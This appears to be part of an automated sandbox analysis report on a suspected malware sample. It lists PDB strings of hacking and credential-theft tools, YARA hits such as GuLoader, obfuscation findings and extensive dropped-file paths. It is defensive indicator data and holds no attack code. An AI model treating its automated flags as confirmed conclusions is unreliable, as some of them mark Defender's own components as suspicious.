Source: Binary string: csgoInjector.pdbx source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp
Source: Binary string: samlib.pdb source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp
Source: Binary string: blinkopt.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: PrivacyMaster\bin\Release\PCPrivacyShield.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: unknowndll.pdbx source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp
Source: Binary string: ntoskrnl.pdb source: MpSigStub.exe, 0000000B.00000003.18277664161.0000021B5E0C2000.00000004.00000001.sdmp
Source: Binary string: MpAdlStub.pdbGCTL source: mpam-796ed98e.exe, 0000000A.00000000.18177888205.00007FF69C51F000.00000002.00020000.sdmp
Source: Binary string: c:.+:\\(projects|src)\\fcrypt\\Release\\S\\s_(high|low).pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: feclient.pdb source: MpSigStub.exe, 0000000B.00000003.18300370279.0000021B5E6B0000.00000004.00000001.sdmp
Source: Binary string: D:\\C\+\+\\.*ShellCode\\Release\\.*ShellCode.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: MpClient.pdbGCTL source: MpSigStub.exe, 0000000B.00000003.18211949370.0000021B4BCC2000.00000004.00000001.sdmp, mpam-728dfe11.exe, 00000011.00000003.18580711669.0000027770032000.00000004.00000001.sdmp, MpSigStub.exe, 00000012.00000003.18626366853.000002DF229B4000.00000004.00000001.sdmp
Source: Binary string: ScreenSnapshot.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: Release\NTDSDumpEx.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: (\Install\trunk\out\release\setup.exe.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: \bd2\master\bin\x64\Debug\bd2.pdb source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp
Source: Binary string: \CCC\obj\Debug\CCC.pdbx source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: PasswordFox.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: SuzanDLL\Release\suzanw.pdbx source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: msswch.pdb source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Source: Yara match File source: 00000006.00000002.18689801595.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
Yara detected Costura Assembly Loader
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e5ccab6.147.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e5ccab6.147.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5fef5492.85.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18271592322.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18306005609.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18261319669.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18312010559.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected AllatoriJARObfuscator
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c7264.168.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c7264.74.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c6d17.72.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c6d17.166.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c67ca.73.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c67ca.167.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18307613737.0000021B5E0EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18277822785.0000021B5E0EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected MSILLoadEncryptedAssembly
Source: Yara match File source: 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Binary or sample is protected by dotNetProtector
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: <dotNetProtector>
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: PvLogiciels.dotNetProtector
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: !#HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: PvLogiciels.dotNetProtector.Runtime
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: <dotNetProtector>x
Source: MpSigStub.exe, 0000000B.00000003.18286365691.0000021B5F81B000.00000004.00000001.sdmp String found in binary or memory: :#Lowfi:HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 0000000B.00000003.18286365691.0000021B5F81B000.00000004.00000001.sdmp String found in binary or memory: :#Lowfi:HSTR:MSIL/PvLogiciels.dotNetProtector.AU5n
Source: MpSigStub.exe, 0000000B.00000003.18286365691.0000021B5F81B000.00000004.00000001.sdmp String found in binary or memory: Y#PERSIST:HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 0000000B.00000003.18286365691.0000021B5F81B000.00000004.00000001.sdmp String found in binary or memory: Y#PERSIST:HSTR:MSIL/PvLogiciels.dotNetProtector.AU6
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_00403A31 push ebx; ret 6_2_00403A38
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_0040731C push ds; ret 6_2_00407336
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B0010 push edi; iretd 6_2_022B0027
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B6A4C push esp; retf 6_2_022B6A17
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B46A7 push 0000003Dh; iretd 6_2_022B46AB
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B3E82 push eax; iretd 6_2_022B3E83
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B0085 push edi; iretd 6_2_022B009C
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B3692 push edx; ret 6_2_022B3693
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B10FF push esp; retf 6_2_022B114D
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B10C8 push esp; retf 6_2_022B114D
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 6_2_022B69A0 push esp; retf 6_2_022B6A17
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 22_3_0074AF3E push ds; retf 22_3_0074AF40
Binary contains a suspicious time stamp
Source: ConfigSecurityPolicy.exe.17.dr Static PE information: 0x6D96FD94 [Thu Apr 6 05:31:00 2028 UTC]
PE file contains sections with non-standard names
Source: MpCmdRun.exe.17.dr Static PE information: section name: .didat
Source: NisSrv.exe.17.dr Static PE information: section name: .didat
Source: MpCmdRun.exe0.17.dr Static PE information: section name: .didat
Source: MpClient.dll.17.dr Static PE information: section name: .didat
Source: MpCommu.dll.17.dr Static PE information: section name: .didat
Source: MpRtp.dll.17.dr Static PE information: section name: .didat
Source: MpSvc.dll.17.dr Static PE information: section name: .didat
Source: ProtectionManagement.dll.17.dr Static PE information: section name: .didat
Source: MpClient.dll0.17.dr Static PE information: section name: .didat
PE file contains an invalid checksum
Source: mpavbase.vdm.11.dr Static PE information: real checksum: 0x354a210 should be:
Source: mpasbase.vdm.11.dr Static PE information: real checksum: 0x329e303 should be:

Persistence and Installation Behavior:

Sample is not signed and drops a device driver
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdBoot.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdDevFlt.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdFilter.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdNisDrv.sys
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpasdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpavdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpasbase.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpavbase.vdm
Drops PE files
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ConfigSecurityPolicy.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpAsDesc.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lb-LU\mpuxagent.dll.mui
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sq-AL\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\mpextms.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\NisSrv.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-PT\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\cs-CZ\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-CN\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\or-IN\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sr-Latn-RS\mpuxagent.dll.mui
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\en-US\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\et-EE\MpAsDesc.dll.mui
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\ucrtbase.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpEvMsg.dll
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\mozMapi32_InUse.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\km-KH\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpDlpCmd.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\th-TH\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpAsDesc.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-CA\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ru-RU\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpDetours.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\mk-MK\mpuxagent.dll.mui
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\AccessibleMarshal.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ja-JP\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ms-MY\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\he-IL\MpAsDesc.dll.mui
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-string-l1-1-0.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpOAV.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nl-NL\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\de-DE\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\te-IN\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\vi-VN\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-TW\ProtectionManagement.dll.mui
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-util-l1-1-0.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpasdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ka-GE\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\en-US\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sr-Cyrl-BA\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\tr-TR\mpuxagent.dll.mui
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\mozMapi32.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\et-EE\mpuxagent.dll.mui
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\lgpllibs.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\da-DK\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ru-RU\ProtectionManagement.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\en-US\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hu-HU\MpEvMsg.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ja-JP\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fi-FI\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sv-SE\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pl-PL\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\mr-IN\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sk-SK\MpAsDesc.dll.mui
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\it-IT\mpuxagent.dll.mui
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\en-GB\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lt-LT\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\de-DE\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSvc.dll
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\vcruntime140.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\endpointdlp.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ca-ES-valencia\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\it-IT\ProtectionManagement.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fil-PH\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ne-NP\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpCopyAccelerator.exe
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\qipcap.dll
